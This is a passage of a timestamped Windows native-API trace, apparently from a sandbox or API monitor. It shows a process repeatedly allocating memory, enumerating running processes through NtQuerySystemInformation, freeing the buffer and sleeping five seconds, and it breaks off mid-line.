[0115.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.414] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.429] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.446] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.460] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.477] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.492] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.507] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.522] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.542] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.554] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.571] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.591] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.601] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.616] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.632] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.649] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.678] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.697] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.709] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.726] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0115.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0115.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0115.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0115.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0115.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0115.742] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0115.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 